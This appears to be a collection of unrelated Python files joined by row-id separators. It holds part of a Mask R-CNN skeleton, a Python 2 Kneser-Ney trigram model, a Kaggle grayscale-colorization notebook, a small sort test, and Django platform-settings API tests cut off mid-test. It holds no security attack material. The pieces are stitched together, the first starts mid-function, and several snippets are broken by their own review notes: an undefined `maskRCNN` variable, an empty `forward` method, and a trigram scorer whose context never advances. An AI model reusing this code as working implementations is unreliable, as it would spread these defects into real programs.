        hs = boxes[:, 3] - boxes[:, 1] + 1
        x_ctr = boxes[:, 0] + ws / 2.
        y_ctr = boxes[:, 1] + hs / 2.
        keep = np.where((ws >= min_size) & (hs >= min_size) &
                        (x_ctr < im_info[1]) & (y_ctr < im_info[0]))[0]
        return keep
    def _clip_tiled_boxes(self, boxes, im_shape):
        """Clip boxes to image boundaries. im_shape is [height, width] and boxes
        has shape (N, 4 * num_tiled_boxes)."""
        assert boxes.shape[1] % 4 == 0, \
            'boxes.shape[1] is {:d}, but must be divisible by 4.'.format(
                boxes.shape[1]
            )
        # Clamp every tiled (x1, y1, x2, y2) group into the image rectangle.
        # x1 >= 0
        boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0)
        # y1 >= 0
        boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0)
        # x2 < im_shape[1]
        boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0)
        # y2 < im_shape[0]
        boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0)
        return boxes
class RPN(nn.Module):
    """Region Proposal Network head.

    A 3x3 conv trunk feeds two 1x1 convs: per-anchor objectness scores
    (sigmoid, hence one output per anchor) and 4 box-regression deltas
    per anchor.

    BUG FIX: the original class statement was missing its trailing colon
    (`class RPN(nn.Module)`), which is a SyntaxError.
    """
    def __init__(self, dim_in, spatial_scale, pretrainfile=None):
        super(RPN, self).__init__()
        self.dim_in = dim_in
        self.dim_out = dim_in
        # NOTE(review): the `spatial_scale` argument is immediately
        # overwritten from CONFIG — confirm whether the parameter should
        # be honored instead.
        spatial_scale = 1.0 / CONFIG.RPN.STRIDE
        anchors = generate_anchors(
            stride=CONFIG.RPN.STRIDE,
            sizes=CONFIG.RPN.SIZES,
            aspect_ratios=CONFIG.RPN.ASPECT_RATIOS)
        num_anchors = anchors.shape[0]
        # RPN hidden representation
        self.RPN_conv = nn.Conv2d(self.dim_in, self.dim_out, 3, 1, 1)
        # Proposal classification scores
        self.n_score_out = num_anchors  # for sigmoid.
        self.RPN_cls_score = nn.Conv2d(self.dim_out, self.n_score_out, 1, 1, 0)
        # Proposal bbox regression deltas
        self.RPN_bbox_pred = nn.Conv2d(self.dim_out, num_anchors * 4, 1, 1, 0)
        self.RPN_GenerateProposals = GenerateProposalsOp(anchors, spatial_scale)
        self.RPN_GenerateProposalLabels = GenerateProposalLabelsOp()
        # NOTE(review): _init_weights is defined below but never invoked —
        # confirm whether it should be called at the end of __init__.
    def _init_weights(self):
        """Gaussian-initialize the RPN conv weights and zero the biases."""
        init.normal_(self.RPN_conv.weight, std=0.01)
        init.constant_(self.RPN_conv.bias, 0)
        init.normal_(self.RPN_cls_score.weight, std=0.01)
        init.constant_(self.RPN_cls_score.bias, 0)
        init.normal_(self.RPN_bbox_pred.weight, std=0.01)
        init.constant_(self.RPN_bbox_pred.bias, 0)
class MaskRCNN(nn.Module):
    """Mask R-CNN skeleton: ResNet-50-C4 backbone + RPN; the RoI heads are
    not implemented yet (placeholders below)."""
    def __init__(self, pretrainfile=None):
        super(MaskRCNN, self).__init__()
        # resnet50C4: stride = 16, outplane = 1024
        self.backbone = resnet50C4(pretrained=True, num_classes=None)
        self.rpn = RPN(dim_in=1024, spatial_scale=1.0 / CONFIG.RPN.STRIDE)
        # BUG FIX: the original code had bare attribute *expressions* here
        # (`self.proposal_layer` etc.), which raise AttributeError the
        # moment the model is constructed. Keep them as explicit TODO
        # placeholders instead.
        self.proposal_layer = None  # TODO: implement proposal layer
        self.roialign_layer = None  # TODO: implement RoIAlign layer
        self.head_bbox = None       # TODO: implement bbox head
        self.head_mask = None       # TODO: implement mask head
        self.init(pretrainfile)
    def init(self, pretrainfile=None):
        """Initialize weights.

        Without `pretrainfile`: He init for convs, unit/zero for batchnorm,
        small Gaussian for linear layers. With `pretrainfile`: load a
        self-trained checkpoint (CPU-safe via map_location).
        """
        if pretrainfile is None:
            for m in self.modules():
                if isinstance(m, nn.Conv2d):
                    # He initialization: std = sqrt(2 / fan_out).
                    n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                    m.weight.data.normal_(0, math.sqrt(2. / n))
                elif isinstance(m, nn.BatchNorm2d):
                    m.weight.data.fill_(1)
                    m.bias.data.zero_()
                elif isinstance(m, nn.Linear):
                    m.weight.data.normal_(0, .1)
                    m.bias.data.zero_()
        else:
            self.load_state_dict(torch.load(pretrainfile, map_location=lambda storage, loc: storage))
            print ('==> load self-train weights as pretrain.')
    def forward(self, input_local, input_global):
        # TODO: wire backbone -> rpn -> RoI heads.
        pass
    def calc_loss(self, pred, gt):
        """Binary cross-entropy (with logits) between `pred` and `gt`."""
        loss = nn.BCEWithLogitsLoss()(pred, gt)
        return loss
## main ##
if __name__ == '__main__':
    # Build the COCO training set and a DataLoader over it; batch size is
    # images-per-GPU times number of GPUs.
    dataset = CocoDataset(CONFIG.DATASET.TRAIN_DIR, CONFIG.DATASET.TRAIN_ANNOFILE)
    batch_size = len(CONFIG.SOLVER.GPU_IDS) * CONFIG.SOLVER.IMS_PER_BATCH
    dataloader = torch.utils.data.DataLoader(
        dataset,
        batch_size=batch_size,
        # sampler=sampler,
        num_workers=CONFIG.SOLVER.WORKERS,
        collate_fn=dataset.collate_minibatch)
    for input_data in tqdm(dataloader):
        for key in input_data:
            if key != 'roidb': # roidb is a list of ndarrays with inconsistent length
                input_data[key] = list(map(Variable, input_data[key]))
        # NOTE(review): `maskRCNN` is never defined in this script, so this
        # line raises NameError — presumably a MaskRCNN(...) instance should
        # be constructed before the loop. Confirm.
        net_outputs = maskRCNN(**input_data)
        # loss = net_outputs['total_loss']
        # optimizer.zero_grad()
        # loss.backward()
        # optimizer.step()
        pass
import math, collections, copy
from nltk.corpus import brown
# Backoff weight applied to the unigram estimate (see KneserTrigramModel.score).
UNI_BACKOFF_COEFFICIENT = .9
# Backoff weight applied to the bigram estimate (see KneserTrigramModel.score).
BI_BACKOFF_COEFFICIENT = .95
# Absolute discount subtracted from observed trigram counts.
DISCOUNT = .35
# Characters stripped from both ends of each token during normalization.
STRIP_CHARS = "<>.\",?! "
class KneserTrigramModel:
    """Kneser-Ney backoff language model (Python 2).

    Trains trigram, bigram and unigram counts on the Brown corpus and
    scores sentences with a discounted trigram estimate, backing off to a
    bigram estimate and then to a Laplace-smoothed unigram estimate when
    the higher-order n-gram was not observed in training.
    """
    def __init__(self):
        """Initialize your data structures in the constructor."""
        self.bigramCounts = collections.defaultdict(lambda : 0)
        self.trigramCounts = collections.defaultdict(lambda : 0)
        # Unigrams default to 1, which builds add-one (Laplace) smoothing
        # directly into the counts.
        self.unigramCounts = collections.defaultdict(lambda : 1)
        # Kneser-Ney continuation counts: number of distinct trigram
        # contexts a word has been observed to complete.
        self.continuationCounts = collections.defaultdict(lambda: 0)
        # For each (w1, w2) context: number of distinct continuation words.
        self.followingCounts = collections.defaultdict(lambda: 0)
        self.total = 1
        self.totalBigramCounts = 0
        print "Training Language Model..."
        self.train(brown.sents())
        print "--Training Complete--"
    def train(self, corpus):
        """ Takes a corpus and trains your language model.
            Compute any counts or other corpus statistics in this function.
        """
        # Accumulate unigram/bigram/trigram counts plus the Kneser-Ney
        # continuation and following counts over every sentence.
        for sentence in corpus:
            prevWord = ""
            prevPrevWord = ""
            for word in sentence:
                # Normalize: strip punctuation/brackets and lowercase.
                word = word.strip(STRIP_CHARS)
                word = word.lower()
                currentWord = word
                self.unigramCounts[currentWord] += 1
                self.total += 1
                if prevWord != "":
                    if prevPrevWord != "":
                        trigram = (prevPrevWord, prevWord, currentWord)
                        # A trigram seen for the first time contributes one
                        # continuation count for the word and one following
                        # count for its two-word context.
                        if trigram not in self.trigramCounts:
                            self.continuationCounts[currentWord] += 1
                            self.followingCounts[(prevPrevWord, prevWord)] += 1
                        self.trigramCounts[trigram] += 1
                        self.bigramCounts[(prevWord, currentWord)] += 1
                        self.totalBigramCounts += 1
                    else:
                        # Second word of the sentence: only a bigram exists.
                        self.bigramCounts[(prevWord, currentWord)] += 1
                        self.totalBigramCounts += 1
                    prevPrevWord = prevWord
                    prevWord = currentWord
                else:
                    # First word of the sentence.
                    prevWord = currentWord
        # Add the vocabulary size for add-one unigram normalization.
        self.total += len(self.unigramCounts)
    def score(self, sentence):
        """ Takes a list of strings as argument and returns the log-probability of the
            sentence using your language model. Use whatever data you computed in train() here.
        """
        # Sum log-probabilities token by token, backing off
        # trigram -> bigram -> smoothed unigram.
        score = 0.0
        prevWord = ""
        prevPrevWord = ""
        newSentence = []
        for word in sentence:
            newSentence += word.split()
        # NOTE(review): `newSentence` is built above but never used — the
        # loop below iterates the original `sentence`; presumably it should
        # iterate newSentence. Confirm.
        for currentWord in sentence:
            currentWord = currentWord.strip(STRIP_CHARS)
            currentWord = currentWord.lower()
            if prevWord != "":
                if prevPrevWord != "":
                    trigram = (prevPrevWord, prevWord, currentWord)
                    trigramCount = self.trigramCounts[trigram]
                    if trigramCount > 0:
                        score += math.log(max(self.trigramCounts[trigram] - DISCOUNT, 0)*len(self.trigramCounts) + DISCOUNT*self.followingCounts[(prevPrevWord, prevWord)]*self.continuationCounts[currentWord])
                        # Subtraction by 1 removes the add one count from the laplace
                        # smoothing
                        score -= math.log((self.bigramCounts[(prevPrevWord, prevWord)]) * len(self.trigramCounts))
                    elif self.bigramCounts[(prevWord, currentWord)] > 0:
                        score += math.log(self.bigramCounts[(prevWord, currentWord)]*BI_BACKOFF_COEFFICIENT)
                        score -= math.log(self.totalBigramCounts)
                    else:
                        count = self.unigramCounts[currentWord]
                        score += math.log(count * UNI_BACKOFF_COEFFICIENT)
                        score -= math.log(self.total)
                    # NOTE(review): prevWord/prevPrevWord are only advanced
                    # in the else-branches below, so once a full trigram
                    # context is reached the context never moves forward.
                    # This looks like a bug — confirm intended behavior.
                else:
                    prevPrevWord = prevWord
                    prevWord = currentWord
            else:
                prevWord = currentWord
        # Returns the *negated* sum of log-probabilities (a positive value).
        return -score
#!/usr/bin/env python
# coding: utf-8
# In[1]:
# Jupyter cell magic (this file is a notebook export): render matplotlib
# figures inline.
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import cv2
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from tensorflow.keras.applications.inception_resnet_v2 import InceptionResNetV2, decode_predictions, preprocess_input
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Conv2D, Conv2DTranspose, Reshape, Dense
import tensorflow as tf
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
import os
# print(os.listdir("../input"))
# Any results you write to the current directory are saved as output.
# In[2]:
# modelv2 = InceptionResNetV2( input_shape = (224, 224, 3), weights = "./input/inception_resnet_v2_weights_tf_dim_ordering_tf_kernels.h5")
# import mumpy
# Load the dataset arrays. Judging by the directory names, gray_scale.npy
# presumably holds the L (lightness) channel and ab1.npy the a/b
# chrominance channels of LAB images — confirm against the dataset docs.
images_gray = np.load('./input/l/gray_scale.npy')
images_lab = np.load('./input/ab/ab/ab1.npy')
print(images_gray.shape)
print(images_lab.shape)
# In[3]:
# imgs = np.zeros((1, 224, 224, 3))
# for i in range(0, 3):
# imgs[0, :, :,i] = images_gray[1029]
# temp_img = preprocess_input(imgs)
# prediction = model_simple.predict(temp_img)
# plt.imshow(prediction[0,:,:,])
# In[4]:
def get_rbg_from_lab(gray_imgs, ab_imgs, n = 10):
    """Assemble 224x224 LAB images from separate L and ab arrays and
    convert the first `n` of them to RGB with OpenCV."""
    lab_stack = np.zeros((n, 224, 224, 3))
    # Channel 0 is L (lightness); channels 1-2 are the ab chrominance pair.
    lab_stack[:, :, :, 0] = gray_imgs[:n]
    lab_stack[:, :, :, 1:] = ab_imgs[:n]
    print(ab_imgs[:n].shape)
    lab_stack = lab_stack.astype("uint8")
    rgb_imgs = np.array(
        [cv2.cvtColor(lab_img, cv2.COLOR_LAB2RGB) for lab_img in lab_stack]
    )
    return rgb_imgs
# Smoke-test the LAB->RGB conversion on a single image (also prints the
# shape of the sliced ab array).
temp = get_rbg_from_lab(gray_imgs = images_gray, ab_imgs = images_lab, n = 1)
# new_model = Model(inputs = modelv2.inputs, outputs = modelv2.output)
# for i, layer in enumerate(new_model.layers):
# layer.trainable = False
# x = Reshape((5, 5, 40))(new_model.output)
# x = Conv2DTranspose(strides = 2, kernel_size = 5, filters = 40, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu)(x)
# x = Conv2DTranspose(strides = 3, kernel_size = 7, filters = 40, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu)(x)
# x = Conv2DTranspose(strides = 3, kernel_size = 9, filters = 20, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu)(x)
# x = Conv2DTranspose(strides = 4, kernel_size = 11, filters = 20, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu)(x)
# x = Conv2D(strides = 2, kernel_size = 5, filters = 12, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu)(x)
# x = Conv2D(strides = 1, kernel_size = 9, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu)(x)
# final_model = Model(inputs = new_model.inputs, outputs = x)
#final_model.predict(get_rbg_from_lab(images_gray, images_lab, n = 2)).shape
# final_model.compile(optimizer = tf.keras.optimizers.SGD(lr=0.01, momentum=0.0, decay=0.0, nesterov=False), loss = tf.losses.mean_pairwise_squared_error)
# In[5]:
def pipe_line_img(gray_scale_imgs, batch_size = 100, preprocess_f = preprocess_input):
    """Turn the first `batch_size` grayscale images into 3-channel inputs.

    Each (224, 224) grayscale image is copied into all three channels of a
    (batch_size, 224, 224, 3) array, which is then passed through
    `preprocess_f` (by default the backbone's `preprocess_input`).
    """
    batch = gray_scale_imgs[:batch_size]
    stacked = np.zeros((batch_size, 224, 224, 3))
    # Replicate the single gray channel across R, G and B.
    for channel in range(3):
        stacked[..., channel] = batch
    return preprocess_f(stacked)
# TensorBoard logging for the training run below.
tbCallBack = tf.keras.callbacks.TensorBoard(log_dir='./folder_to_save_graph_3', histogram_freq=0, write_graph=True, write_images=True)
# Model inputs: grayscale images replicated to 3 channels, preprocessed.
imgs_for_input = pipe_line_img(images_gray, batch_size = 1500)
# Model targets: RGB reconstructions from the L + ab channels, preprocessed
# the same way as the inputs.
imgs_for_output = preprocess_input(get_rbg_from_lab(gray_imgs = images_gray, ab_imgs = images_lab, n = 1500))
# plt.imshow(imgs_for_input)
# print(imgs_for_input.shape)
# plt.imshow(imgs_for_output[1])
# plt.imshow(imgs_for_input[1])
# print(imgs_for_output)
# In[6]:
# model.add(layers.Dense(output_dim=n, activation=softMaxAxis(1)))
# In[7]:
# A small fully-convolutional colorization baseline: 3x3 convs widen the
# features (16 -> 32 -> 64), then a 3-filter conv maps back to an RGB-like
# output. Stride 1 + "same" padding throughout, so 224x224 is preserved.
model_simple = Sequential()
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 16, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu, input_shape = (224, 224, 3)))
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 32, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# NOTE(review): input_shape on a non-first Sequential layer is ignored by
# Keras — the argument below is redundant.
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 64, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu, input_shape = (224, 224, 3)))
# model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 128, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Dense(units=1, activation='softmax'))
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 12, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 12, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu))
# NOTE(review): tf.losses.mean_pairwise_squared_error is a TF1-era symbol;
# confirm the TF version in use (under TF2 this lives in tf.compat.v1).
model_simple.compile(optimizer = tf.keras.optimizers.Adam(epsilon = 1e-4), loss = tf.losses.mean_pairwise_squared_error)
# imgs_for_s = np.zeros((1000, 224, 224, 1))
# imgs_for_s[:, :, :, 0] = images_gray[:1000]
# prediction = model_simple.predict(imgs_for_input)
# In[8]:
model_simple.summary()
# In[ ]:
# In[ ]:
# In[ ]:
# In[9]:
# Train on the first 1000 samples (10% held out for validation).
model_simple.fit(imgs_for_input[:1000], imgs_for_output[:1000], epochs = 50, callbacks = [tbCallBack], validation_split = 0.1, shuffle = True)
# model_simple.fit(imgs_for_input, imgs_for_output, epochs = 1100, batch_size = 16)
# prediction = model_simple.predict(imgs_for_input[:1000])
# In[10]:
# Predict colorization for sample 1029 (outside the training slice) and show
# (input | ground truth | prediction) side by side.
imgs = np.zeros((1, 224, 224, 3))
for i in range(0, 3):
    # Replicate the grayscale image into all three channels.
    imgs[0, :, :, i] = images_gray[1029]
temp_img = preprocess_input(imgs)
prediction = model_simple.predict(temp_img)
# Concatenate along width (axis 1): input, target, prediction.
image_1029 = np.concatenate((imgs_for_input[1029], imgs_for_output[1029], prediction[0, :, :, ]), 1)
# print(img_list.shape)
plt.imshow(image_1029)
plt.axis("off")
# In[13]:
# Build a 2-row comparison grid for samples 1028 and 1029:
# each row is (input | ground truth | prediction).
imgs = np.zeros((1, 224, 224, 3))
for i in range(0, 3):
    imgs[0, :, :, i] = images_gray[1029]
temp_img = preprocess_input(imgs)
prediction1 = model_simple.predict(temp_img)
imgs = np.zeros((1, 224, 224, 3))
for i in range(0, 3):
    imgs[0, :, :, i] = images_gray[1028]
temp_img = preprocess_input(imgs)
prediction0 = model_simple.predict(temp_img)
image_0 = np.concatenate((imgs_for_input[1028], imgs_for_output[1028], prediction0[0, :, :, ]), 1)
image_1 = np.concatenate((imgs_for_input[1029], imgs_for_output[1029], prediction1[0, :, :, ]), 1)
image_new_two = np.concatenate((image_0, image_1), 0)
# print(img_list.shape)
# Bug fix: this cell previously displayed the stale `image_1029` from the
# earlier cell instead of the two-row grid it just assembled.
plt.imshow(image_new_two)
plt.axis("off")
# plt.imshow(prediction[0,:,:,])
# In[ ]:
# Bug fix: at this point `prediction` still held a single-image batch of
# shape (1, 224, 224, 3), so `prediction[2]` / `prediction[5]` below raised
# IndexError. Recompute predictions for the first few training inputs
# (matching the commented-out batch prediction above) before indexing.
prediction = model_simple.predict(imgs_for_input[:6])
# Sample 2: (input | ground truth | prediction), concatenated along width.
image_cake = np.concatenate((imgs_for_input[2], imgs_for_output[2], prediction[2, :, :, ]), 1)
# print(img_list.shape)
plt.imshow(image_cake)
plt.axis("off")
# In[ ]:
# img_list = []
# img_list.append(
image_noidea = np.concatenate((imgs_for_input[5], imgs_for_output[5], prediction[5, :, :, ]), 1)
# img_list = np.array(img_list)
# img_list = np.squeeze(img_list, axis=0)
# print(img_list.shape)
plt.imshow(image_noidea)
plt.axis("off")
# In[ ]:
# Stack both comparison strips vertically.
image_two = np.concatenate((image_cake, image_noidea), 0)
plt.imshow(image_two)
plt.axis("off")
# In[ ]:
# #split train and validation data
# import numpy as np
# from matplotlib import pyplot as plt
# images_gray = np.load(opt.dataroot+'A/gray_scale.npy')
# images_lab = np.load(opt.dataroot+'B/ab1.npy')
# np.save(opt.dataroot + 'Train/A/gray_scale.npy', images_gray[:300])
# np.save(opt.dataroot + 'Train/B/ab1.npy', images_lab[:300] )
# images_gray = np.load(opt.dataroot + 'Train/A/gray_scale.npy')
# images_lab = np.load(opt.dataroot + 'Train/B/ab1.npy')
# plt.figure()
# plt.imshow(images_gray[29],cmap='gray')
# plt.show()
# images_gray = np.load(opt.dataroot+'A/gray_scale.npy')
# images_lab = np.load(opt.dataroot+'B/ab1.npy')
# np.save(opt.dataroot + 'Test/A/gray_scale.npy', images_gray[1000:1030])
# np.save(opt.dataroot + 'Test/B/ab1.npy', images_lab[1000:1030])
# images_gray = np.load(opt.dataroot + 'Test/A/gray_scale.npy')
# images_lab = np.load(opt.dataroot + 'Test/B/ab1.npy')
# plt.figure()
# plt.imshow(images_gray[0],cmap='gray')
# plt.show()
# In[ ]:
# trainDataloader = DataLoader(ImageDataset(opt.dataroot + 'Train/', transforms_ = transforms_), batch_size=opt.batchSize, shuffle=True, num_workers=opt.n_cpu)
# testDataloader = DataLoader(ImageDataset(opt.dataroot + 'Test/', transforms_ = transforms_), batch_size=opt.batchSize, shuffle=False, num_workers=opt.n_cpu)
|
20,712 | 3badcc17ff464c531702ea661df335b9d44c7bcd | def test_sortfunction(sortfunction):
assert(list(sortfunction([3,1,5,2,17,22,42,38])) == [1,2,3,5,17,22,38,42])
assert(list(sortfunction([1,2,3,4,5])) == [1,2,3,4,5])
assert(list(sortfunction([])) == [])
print("Alle Tests für {} ok".format(sortfunction.__name__))
|
20,713 | cc8857835edd68d7cafb39f8817492b0ed6dc909 | from decimal import Decimal
import mock
from django.contrib.auth.models import Group, Permission
from django.core.files.base import File
from django.test.utils import override_settings
from django.urls import reverse
from django_elasticsearch_dsl.test import ESTestCase
from rest_framework import status
from bluebottle.clients import properties
from bluebottle.cms.models import SitePlatformSettings
from bluebottle.funding.models import FundingPlatformSettings
from bluebottle.initiatives.models import InitiativePlatformSettings
from bluebottle.members.models import MemberPlatformSettings
from bluebottle.notifications.models import NotificationPlatformSettings
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.utils import BluebottleTestCase
class ClientSettingsTestCase(BluebottleTestCase):
    """Tests for the tenant 'settings' endpoint: which Django settings are
    exposed, how tenant (client) properties override them, and how the
    configured payment methods are summarized into a currency list."""

    def setUp(self):
        super(ClientSettingsTestCase, self).setUp()
        self.settings_url = reverse('settings')

    @override_settings(PARENT={'child': True}, EXPOSED_TENANT_PROPERTIES=['parent.child'])
    def test_nested_exposed_properties(self):
        # Dotted names in EXPOSED_TENANT_PROPERTIES expose nested values.
        response = self.client.get(self.settings_url)
        self.assertEqual(response.data['parent']['child'], True)

    @override_settings(CLOSED_SITE=False, TOP_SECRET="*****", EXPOSED_TENANT_PROPERTIES=['closed_site'])
    def test_settings_show(self):
        # Check that exposed property is in settings api, and other settings are not shown
        response = self.client.get(self.settings_url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['closedSite'], False)
        self.assertNotIn('topSecret', response.data)
        # Check that exposed setting gets overwritten by client property
        setattr(properties, 'CLOSED_SITE', True)
        response = self.client.get(self.settings_url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['closedSite'], True)
        # Check that previously hidden setting can be exposed
        setattr(properties, 'EXPOSED_TENANT_PROPERTIES', ['closed_site', 'top_secret'])
        response = self.client.get(self.settings_url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertIn('topSecret', response.data)
        # Reset the module-level property so later tests are unaffected.
        setattr(properties, 'CLOSED_SITE', False)

    @override_settings(TOKEN_AUTH={'assertion_mapping': {'first_name': 'urn:first_name'}})
    def test_settings_read_only(self):
        # Fields driven by the SSO assertion mapping are reported read-only.
        response = self.client.get(self.settings_url)
        self.assertEqual(response.data['readOnlyFields'], {'user': ['first_name']})

    @override_settings(
        PAYMENT_METHODS=[{
            'provider': 'docdata',
            'id': 'docdata-ideal',
            'profile': 'ideal',
            'name': 'iDEAL',
            'restricted_countries': ('NL',),
            'currencies': {
                'EUR': {'max_amount': 100}
            }
        }, {
            'provider': 'docdata',
            'id': 'docdata-directdebit',
            'profile': 'directdebit',
            'name': 'Direct Debit',
            'restricted_countries': ('NL', 'BE',),
            'currencies': {
                'EUR': {'min_amount': 10, 'max_amount': 100}
            }
        }, {
            'provider': 'docdata',
            'id': 'docdata-creditcard',
            'profile': 'creditcard',
            'name': 'CreditCard',
            'currencies': {
                'USD': {'min_amount': 5, 'max_amount': 100},
                'NGN': {'min_amount': 3000, 'max_amount': 100},
                'XOF': {'min_amount': 5000, 'max_amount': 100},
            }
        }],
        DEFAULT_CURRENCY='USD'
    )
    def test_settings_currencies(self):
        # The currency summary is derived from PAYMENT_METHODS: one entry per
        # currency with its symbol, exchange rate and minimum amount.
        # NOTE(review): rates (1.5 EUR, 500 NGN, ...) presumably come from
        # fixture exchange-rate data loaded by BluebottleTestCase — confirm.
        response = self.client.get(self.settings_url)
        expected = [
            {
                'symbol': '€',
                'code': 'EUR',
                'name': 'Euro',
                'rate': Decimal(1.5),
                'minAmount': 0
            },
            {
                'symbol': '₦',
                'code': 'NGN',
                'name': 'Nigerian Naira',
                'rate': Decimal(500.0),
                'minAmount': 3000
            },
            {
                'symbol': '$',
                'code': 'USD',
                'name': 'US Dollar',
                'rate': Decimal(1.0),
                'minAmount': 5
            },
            {
                'symbol': 'CFA',
                'code': 'XOF',
                'name': 'West African CFA Franc',
                'rate': Decimal(1000.0),
                'minAmount': 5000
            },
        ]
        # Compare order-insensitively by sorting both sides on name.
        result = response.data['currencies']
        result = sorted(result, key=lambda i: i['name'])
        expected = sorted(expected, key=lambda i: i['name'])
        self.assertEqual(result, expected)
@override_settings(
    ELASTICSEARCH_DSL_AUTOSYNC=True,
    ELASTICSEARCH_DSL_AUTO_REFRESH=True
)
class TestDefaultAPI(ESTestCase, BluebottleTestCase):
    """
    Test the default API, open and closed, authenticated or not
    with default permissions
    """

    def setUp(self):
        super(TestDefaultAPI, self).setUp()
        self.init_projects()
        self.user = BlueBottleUserFactory.create()
        self.user_token = "JWT {0}".format(self.user.get_jwt_token())
        self.initiatives_url = reverse('initiative-preview-list')

    def test_open_api(self):
        """ request open api, expect projects """
        response = self.client.get(self.initiatives_url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    @mock.patch('bluebottle.clients.properties.CLOSED_SITE', True)
    def test_closed_api_not_authenticated(self):
        """ request closed api, expect 403 ? if not authenticated """
        # Strip the anonymous group's read permission so the closed-site
        # behaviour (401) is exercised rather than the permission fallback.
        anonymous = Group.objects.get(name='Anonymous')
        anonymous.permissions.remove(
            Permission.objects.get(codename='api_read_initiative')
        )
        response = self.client.get(self.initiatives_url)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    @mock.patch('bluebottle.clients.properties.CLOSED_SITE', True)
    def test_closed_api_authenticated(self):
        """ request closed api, expect projects if authenticated """
        response = self.client.get(self.initiatives_url, token=self.user_token)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
class TestPlatformSettingsApi(BluebottleTestCase):
    """
    Test platform settings api.
    """

    def setUp(self):
        super(TestPlatformSettingsApi, self).setUp()
        self.init_projects()
        self.settings_url = reverse('settings')

    def test_site_platform_settings(self):
        with open('./bluebottle/cms/tests/test_images/upload.png', 'rb') as f:
            image = File(f)
            # Create site platform settings and confirm they end up correctly in settings api
            SitePlatformSettings.objects.create(
                contact_email='malle@epp.ie',
                contact_phone='+3163202128',
                copyright='Malle Eppie Ltd.',
                powered_by_text='Powered by',
                powered_by_link='https://epp.ie',
                footer_banner=image
            )
        response = self.client.get(self.settings_url)
        self.assertEqual(response.data['platform']['content']['contact_email'], 'malle@epp.ie')
        self.assertEqual(response.data['platform']['content']['contact_phone'], '+3163202128')
        self.assertEqual(response.data['platform']['content']['copyright'], 'Malle Eppie Ltd.')
        self.assertEqual(response.data['platform']['content']['powered_by_link'], 'https://epp.ie')
        self.assertEqual(response.data['platform']['content']['powered_by_text'], 'Powered by')
        # The uploaded banner should be served from the media root.
        self.assertTrue(
            response.data['platform']['content']['footer_banner'].startswith(
                '/media/'
            )
        )

    def test_initiative_platform_settings(self):
        # Create initiative platform settings and confirm they end up correctly in settings api
        InitiativePlatformSettings.objects.create(
            activity_types=['event', 'job'],
            initiative_search_filters=['category', 'location'],
            activity_search_filters=['type', 'skill', 'status'],
            contact_method='phone',
            require_organization=True,
            team_activities=True
        )
        response = self.client.get(self.settings_url)
